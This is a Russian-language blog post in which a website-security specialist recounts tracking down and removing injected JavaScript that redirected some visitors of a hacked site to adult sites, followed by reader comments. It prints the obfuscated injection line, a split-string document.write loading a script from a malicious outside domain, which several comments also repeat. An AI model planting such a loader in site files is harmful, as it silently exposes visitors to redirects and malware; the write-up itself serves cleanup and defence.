История лечения одного зараженного сайта или как найти вирус самостоятельно

Вирусы (речь про компьютерные) бывают разные. Порой удивляешься смекалке распространителей. И поскольку почти ежедневно по роду своей деятельности занимаюсь ими, то и удивления бывают разные. Но зачастую, распространители вирусов - парни хоть и хитрые, найти и обнаружить следы посторонней деятельности на своем сайте можно и без помощи специалистов. Разумеется и случаи бывают разные. Расскажу один будничный момент - историю лечения одного зараженного сайта.

"Разбирался" с одним "умным" вирусом сегодня (распространяются вирусы хакерами с разных стран и континентов, поэтому очень редко попадаешь на один и тот же, приходится каждый раз включать смекалку и целый набор разных утилит для поиска и устранения вируса): вы увидите, что ничего сложного, но обязательно нужна смекалка!

Очередной "пострадавший" вебмастер рассказывает: посетители жалуются, что с его сайта идет редирект на посторонние сайты непристойной тематики. Редирект работает не всегда, очень редко, лишь для избранных и не понятно вообще по-какому признаку. Но самое главное:

  • никаких извещений поисковых систем (сайт чистый и пушистый);
  • ни один онлайн-сканер не видит на сайте мобильного редиректа;
  • ни один из пяти протестировавших сайт на мобильном устройстве не увидел редиректа;
  • никакого постороннего или подозрительного кода в исходном коде страницы нет;
  • никаких следов редиректа в файлах .htaccess или используемой темы нет...

Тем не менее, смекалисто открываю в браузере подгружаемые скрипты и вижу следующую картину:

Вредоносного скрипта нет в исходном коде страницы, но есть в загруженных скриптах

Как видим, происходит подгрузка внешнего файла и с довольно таки подозрительного домена (да никакая самая страшная тизерная сеть не придумает такое название) - 6dfas9obxn234.us

Вбиваю в поиск - информации не много, лишь то, что сайт явно распространитель вирусов и по состоянию на 2 марта 2015 года лишь 7 из 62 антивирусов засомневались в чистоте домена. Кстати, просканировал и онлайн утилитой Dr.Web и, о чудо: сайт находится в базе нежелательных сайтов Dr.Web, но при всем при этом, проверенные им файлы js - потенциальные распространители такой заразы чисты и безневинны!

Сканирую файлы сайта на распространенные сигнатуры вирусов: шеллы, трояны... ничего! Не расстаюсь с версией, что код вызова внешнего сайта в js файлах. Проверяется моя версия просто: папки с js переименовываем (например, в js_) и смотрим на загруженные скрипты в браузере. Гениально! Теперь вредоносного домена не видно!

Теперь грузим на сайт утилиту поиска текста в файлах и ищем куски домена, "dfas9o", "n234.", "php?tds"... и ниже увидим почему куски. Быстро находится вставка в некоторых из js файлов следующего содержания:

document.write('<sc' + 'ript sr' + 'c="http://6d' + 'fas9obxn234.us/tds/j' + 's.php?tds=1651">');

Предвкушая победу над бредокодом, названия папок с js вернул вспять, но... ОПЯТЬ грузится вредоносный 6dfas9obxn234.us! Пребываю в недоумении, поскольку дальнейшие поиски никаких кусков вышеназванного домена не находятся больше на сайте!

Значит, кодирован и находится в тех же js файлах. В первую очередь смотрим на те, что используются темой и подгружаются в блоке. В одном из них (в ручном режиме) находится кодированная вставка:

Сигнатура вируса

Теперь ищем его куски "поиском и заменой" - находим в некоторых других и удаляем! Всегда так делайте: злоумышленник страхует себя всегда: его задача заставить код продержаться на сайте как можно больше и задача запутать вебмастера - код будет в разных файлах и разного вида.

После очистки всех зловредных кодов проверяем список подгружаемых скриптов: чисто! Значит поставленную задачу выполнили. Естественно, за кадром осталась история появления этого кода на сайте, но моя задача была показать Вам, как осуществляется поиск и устранение вредоносного кода и какую роль в этом играет смекалка!

А как вы боретесь с вирусами? И какие типы Вы встречали на своих сайтах?

Оцените материал:
Звёзд: 1Звёзд: 2Звёзд: 3Звёзд: 4Звёзд: 5 (3 голоса, рейтинг: 4,67 из 5)
Загрузка...

Вячеслав - типичный интернетчикВячеслав Скоблей (ака files) - типичный интернетчик. Скитаюсь интернетом, пишу на PHP, увлекаюсь созданием веб-сайтов на Wordpress, решаю многочисленные проблемы, которые до появления интернета не существовали...

Специализируюсь на безопасности сайтов: защищаю сайты от атак и взломов, занимаюсь лечением вирусов на сайтах и профилактикой...

Наверняка у Вас есть вопросы, просьбы или пожелания. Не стесняйтесь спросить, я отвечаю всегда быстро...

6 комментарий

  1. Денис says:

    Блиииннн... hxxp://6dfas9obxn234.us/tds/js.php?tds=1651 - такая же фигня :( Из статьи, увы, не понял, как удалить(( Помогите, плиз...

    1. Вячеслав says:

      В скайп постучите. Контакты есть на сайте.

  2. Андрей says:

    Привет. У меня сайт обращается к вот такой фигне 6dfas9obxn234.us/tds/js.php?tds=1651 И я не программист и не совсем понимаю как его нужно дальше искать. Что значит смотрим файлы куда тема обращается и что именно нужно искать?

    1. Вячеслав says:

      Связались по скайпу, проблему быстро ликвидировали.
      Андрей, при возникновении аналогичных ситуаций, всегда сигнализируйте!
      Это обращение также к людям ничего не понимающих в кодах!

      1. Андрей says:

        Оке :)

      2. Клад says:

        Мля, на каком языке пишете - "ликвидировали", "при возникновении аналогичных ситуаций"? Вы чиновник, что ли? Почитайте Нору Галь, пойдет на пользу!

Добавить комментарий для Андрей Отменить ответ

Ваш адрес email не будет опубликован.